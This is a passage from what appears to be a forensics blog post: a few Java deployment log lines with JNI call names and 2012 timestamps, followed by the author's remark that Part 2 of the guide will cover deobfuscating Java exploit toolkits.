 == Start JNICALL Java_com_sun_deploy_util_UpdateCheck_shouldPromptForAutoCheck ==  
 -----------------------------------------  
 Process start at 07/30/2012-20:14:34.  
 -----------------------------------------  
 == Start JNICALL Java_com_sun_deploy_panel_PlatformSpecificUtils_getPublicJres ==  
 -----------------------------------------  
 Process start at 07/30/2012-20:14:34.  
 -----------------------------------------  
 == Start JNICALL Java_com_sun_deploy_util_UpdateCheck_shouldPromptForAutoCheck ==  


As mentioned all this was possible due to Corey's posts. The post doesn't highlight anything additional to the information that Corey hasn't already provided. My goal was to provide another example for anyone interested but also assist me when discussing Part 2 of this guide when I'll begin to discuss a beginners attempt to deobfuscating Java exploit toolkits.